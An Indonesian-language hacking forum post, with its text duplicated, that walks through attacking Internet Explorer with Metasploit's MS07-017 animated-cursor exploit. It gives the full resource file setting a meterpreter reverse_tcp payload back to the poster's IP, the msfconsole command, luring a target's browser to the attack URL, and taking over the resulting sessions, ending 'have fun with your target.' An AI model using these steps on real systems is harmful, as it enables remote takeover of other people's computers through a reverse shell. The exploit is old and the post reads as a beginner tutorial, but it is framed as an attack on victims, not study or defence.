11-06-2011, 07:42 PM
numpang ngepost y... 
bugs ini udh termasuk bugs yg udah tua, tpi lumayan lah buat yag bru belajar kya ane...
.
pertama buat file ie_ani (terserah namanya apa, n text editor boleh apa aja)
trus paste kode di bawah pada file ie_ani.. Nb SRVHOST n LHOST itu ip ente
trus save..
jalanin msfconsole dengan menggunakan resource file ie_ani
ini hasil'y
![[Image: ie_ani.png]](http://i1112.photobucket.com/albums/k498/koteka_baliem/ie_ani.png)
trus arahin target ke ip kita lewat ie browser:
ip ane di sini 192.168.56.102 n uripath'y /ani
![[Image: targetrunningie.png]](http://i1112.photobucket.com/albums/k498/koteka_baliem/targetrunningie.png)
akhirnya meterpreter terbuka untuk di exploitasi
daftar sessions yg aktif
berpindah ke sessions
![[Image: meterpreter.png]](http://i1112.photobucket.com/albums/k498/koteka_baliem/meterpreter.png)
buat command meterpreter ud prnh di bahas ama om zee di forum, search aj... n have fun with your target...

bugs ini udh termasuk bugs yg udah tua, tpi lumayan lah buat yag bru belajar kya ane...

pertama buat file ie_ani (terserah namanya apa, n text editor boleh apa aja)
Code:
# nano ie_ani
trus paste kode di bawah pada file ie_ani.. Nb SRVHOST n LHOST itu ip ente
Code:
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.56.102
set SRVPORT 80
set LHOST 192.168.56.102
set LPORT 443
set URIPATH /ani
exploit
trus save..
jalanin msfconsole dengan menggunakan resource file ie_ani
Code:
# msfconsole -r ie_ani
ini hasil'y
![[Image: ie_ani.png]](http://i1112.photobucket.com/albums/k498/koteka_baliem/ie_ani.png)
trus arahin target ke ip kita lewat ie browser:
ip ane di sini 192.168.56.102 n uripath'y /ani
Code:
192.168.56.102/ani
![[Image: targetrunningie.png]](http://i1112.photobucket.com/albums/k498/koteka_baliem/targetrunningie.png)
akhirnya meterpreter terbuka untuk di exploitasi

daftar sessions yg aktif
Code:
sessions -l
Code:
sessions -i <nmr sessions>
![[Image: meterpreter.png]](http://i1112.photobucket.com/albums/k498/koteka_baliem/meterpreter.png)
buat command meterpreter ud prnh di bahas ama om zee di forum, search aj... n have fun with your target...

Hacking isn't just Computers & Exploits. It's a Philosophy.